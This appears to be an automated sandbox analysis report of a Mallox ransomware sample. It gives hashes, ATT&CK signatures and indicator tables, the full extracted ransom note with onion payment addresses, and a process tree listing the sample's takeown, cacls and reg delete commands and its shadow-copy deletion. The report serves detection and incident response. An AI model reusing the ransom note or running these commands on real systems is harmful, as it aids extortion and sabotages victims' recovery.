6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8

Analysis

max time kernel
151s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
22/09/2023, 04:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe
Size

54KB
MD5

922b792af0973f66295ac008a4bf8ba5
SHA1

ee192b0baabf0400d539fdfdfa29dbf77e510651
SHA256

6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8
SHA512

9056f1f0b24a412280630a5c853ff42b7e6859de721c4ec44dff68440047df236375d7b62c7e29360bcb3a1dd6472396c41efc9c13ac6e7ed4d4e47fcb42f611
SSDEEP

768:Rtw7IhDZJ6hewrODscKPuI0oA9qytCFIa02ZlT7lSH6QywpLPCGgj4aRFElcn7gD:PLohTPcKEo6aFEQtvpa

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

F:\HOW TO BACK FILES.txt

Ransom Note

Hello Your files are encrypted and can not be used We have downloaded your confidential data and are ready to publish it on our blog To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 86C115F74384E550BB6448A1 5) You will see payment information and we can make free test decryption here 6)After payment, you will receive a tool for decrypting files, and we will delete the data that was taken from you Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (3598) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4060	takeown.exe
2168	takeown.exe
3360	takeown.exe
4816	takeown.exe
3800	takeown.exe
2848	takeown.exe
4632	takeown.exe
4216	takeown.exe
3300	takeown.exe
4932	takeown.exe
292	takeown.exe
2576	takeown.exe
3212	takeown.exe
2384	takeown.exe
4444	takeown.exe
2400	takeown.exe
4364	takeown.exe
3944	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Arulyn = "C:\\Users\\Admin\\AppData\\Roaming\\Arulyn.exe"	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	MSBuild.exe
File opened (read-only)	\??\H:	MSBuild.exe
File opened (read-only)	\??\N:	MSBuild.exe
File opened (read-only)	\??\R:	MSBuild.exe
File opened (read-only)	\??\S:	MSBuild.exe
File opened (read-only)	\??\V:	MSBuild.exe
File opened (read-only)	\??\W:	MSBuild.exe
File opened (read-only)	\??\B:	MSBuild.exe
File opened (read-only)	\??\J:	MSBuild.exe
File opened (read-only)	\??\K:	MSBuild.exe
File opened (read-only)	\??\M:	MSBuild.exe
File opened (read-only)	\??\Q:	MSBuild.exe
File opened (read-only)	\??\U:	MSBuild.exe
File opened (read-only)	\??\X:	MSBuild.exe
File opened (read-only)	\??\G:	MSBuild.exe
File opened (read-only)	\??\I:	MSBuild.exe
File opened (read-only)	\??\P:	MSBuild.exe
File opened (read-only)	\??\Z:	MSBuild.exe
File opened (read-only)	\??\D:	MSBuild.exe
File opened (read-only)	\??\E:	MSBuild.exe
File opened (read-only)	\??\L:	MSBuild.exe
File opened (read-only)	\??\O:	MSBuild.exe
File opened (read-only)	\??\T:	MSBuild.exe
File opened (read-only)	\??\Y:	MSBuild.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4692 set thread context of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-400.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-100.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-72_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\loc\AppXManifestLoc.16.en-us.xml	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\subscription_intro\save-money.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-100_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-ms	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-125_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png	MSBuild.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-150_contrast-black.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-200_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-100.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ContactPhoto.scale-180.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-250.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxMediumTile.scale-125.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\LargeTile.scale-200.png	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\ui-strings.js	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-60_altform-unplated.png	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\selector.js	MSBuild.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME.txt	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageMedTile.scale-150.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl.winmd	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SmallTile.scale-100_contrast-black.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-64_contrast-black.png	MSBuild.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-30_altform-unplated_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupWideTile.scale-400.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-40.png	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-125_contrast-white.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-150_contrast-black.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\WideTile.scale-100.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubStoreLogo.scale-100_contrast-black.png	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\dcf.x-none.msi.16.x-none.vreg.dat	MSBuild.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\SensorFusionLib.winmd	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyShare.scale-400.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-100.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-36.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-96_altform-lightunplated.png	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_7.m4a	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-200.png	MSBuild.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-oob.xrm-ms	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\HOW TO BACK FILES.txt	MSBuild.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xea23.png	MSBuild.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\wmplayer.exe.mui	MSBuild.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\HOW TO BACK FILES.txt	MSBuild.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2168	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1416	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe
4508	MSBuild.exe
4508	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe
Token: SeTakeOwnershipPrivilege	3800	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	MSBuild.exe
Token: SeDebugPrivilege	4508	MSBuild.exe
Token: SeBackupPrivilege	4128	vssvc.exe
Token: SeRestorePrivilege	4128	vssvc.exe
Token: SeAuditPrivilege	4128	vssvc.exe
Token: SeTakeOwnershipPrivilege	2848	takeown.exe
Token: SeTakeOwnershipPrivilege	4632	takeown.exe
Token: SeTakeOwnershipPrivilege	4216	takeown.exe
Token: SeTakeOwnershipPrivilege	4364	takeown.exe
Token: SeTakeOwnershipPrivilege	2384	takeown.exe
Token: SeTakeOwnershipPrivilege	3360	takeown.exe
Token: SeTakeOwnershipPrivilege	4932	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 3900	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	87
PID 4692 wrote to memory of 3900	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	87
PID 4692 wrote to memory of 3900	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	87
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 4692 wrote to memory of 4508	4692	6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe	89
PID 3900 wrote to memory of 1016	3900	cmd.exe	90
PID 3900 wrote to memory of 1016	3900	cmd.exe	90
PID 3900 wrote to memory of 1016	3900	cmd.exe	90
PID 3900 wrote to memory of 3800	3900	cmd.exe	91
PID 3900 wrote to memory of 3800	3900	cmd.exe	91
PID 3900 wrote to memory of 3800	3900	cmd.exe	91
PID 3900 wrote to memory of 1264	3900	cmd.exe	92
PID 3900 wrote to memory of 1264	3900	cmd.exe	92
PID 3900 wrote to memory of 1264	3900	cmd.exe	92
PID 3900 wrote to memory of 4648	3900	cmd.exe	93
PID 3900 wrote to memory of 4648	3900	cmd.exe	93
PID 3900 wrote to memory of 4648	3900	cmd.exe	93
PID 3900 wrote to memory of 1872	3900	cmd.exe	94
PID 3900 wrote to memory of 1872	3900	cmd.exe	94
PID 3900 wrote to memory of 1872	3900	cmd.exe	94
PID 3900 wrote to memory of 2352	3900	cmd.exe	95
PID 3900 wrote to memory of 2352	3900	cmd.exe	95
PID 3900 wrote to memory of 2352	3900	cmd.exe	95
PID 3900 wrote to memory of 976	3900	cmd.exe	96
PID 3900 wrote to memory of 976	3900	cmd.exe	96
PID 3900 wrote to memory of 976	3900	cmd.exe	96
PID 3900 wrote to memory of 3548	3900	cmd.exe	97
PID 3900 wrote to memory of 3548	3900	cmd.exe	97
PID 3900 wrote to memory of 3548	3900	cmd.exe	97
PID 3900 wrote to memory of 3296	3900	cmd.exe	98
PID 3900 wrote to memory of 3296	3900	cmd.exe	98
PID 3900 wrote to memory of 3296	3900	cmd.exe	98
PID 3900 wrote to memory of 2368	3900	cmd.exe	99
PID 3900 wrote to memory of 2368	3900	cmd.exe	99
PID 3900 wrote to memory of 2368	3900	cmd.exe	99
PID 3900 wrote to memory of 3796	3900	cmd.exe	100
PID 3900 wrote to memory of 3796	3900	cmd.exe	100
PID 3900 wrote to memory of 3796	3900	cmd.exe	100
PID 3900 wrote to memory of 3244	3900	cmd.exe	101
PID 3900 wrote to memory of 3244	3900	cmd.exe	101
PID 3900 wrote to memory of 3244	3900	cmd.exe	101
PID 3900 wrote to memory of 1336	3900	cmd.exe	102
PID 3900 wrote to memory of 1336	3900	cmd.exe	102
PID 3900 wrote to memory of 1336	3900	cmd.exe	102
PID 3900 wrote to memory of 2672	3900	cmd.exe	103
PID 3900 wrote to memory of 2672	3900	cmd.exe	103
PID 3900 wrote to memory of 2672	3900	cmd.exe	103
PID 3900 wrote to memory of 4364	3900	cmd.exe	104
PID 3900 wrote to memory of 4364	3900	cmd.exe	104
PID 3900 wrote to memory of 4364	3900	cmd.exe	104
PID 3900 wrote to memory of 3884	3900	cmd.exe	105
PID 3900 wrote to memory of 3884	3900	cmd.exe	105
PID 3900 wrote to memory of 3884	3900	cmd.exe	105
PID 3900 wrote to memory of 3764	3900	cmd.exe	106
PID 3900 wrote to memory of 3764	3900	cmd.exe	106
PID 3900 wrote to memory of 3764	3900	cmd.exe	106

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe
"C:\Users\Admin\AppData\Local\Temp\6f13a8378f21522f89f8933ea240d2f78ff052ea1c21243d78af2364680f00d8.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kill-Delete.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /g Administrators:f
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Users:r
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:976
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
    3⤵
    PID:3244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d "network service"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g system:r
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cmd.exe /a
    3⤵
    - Modifies file permissions
    PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
    3⤵
    PID:468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
    3⤵
    PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /g Administrators:f
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cacls.exe
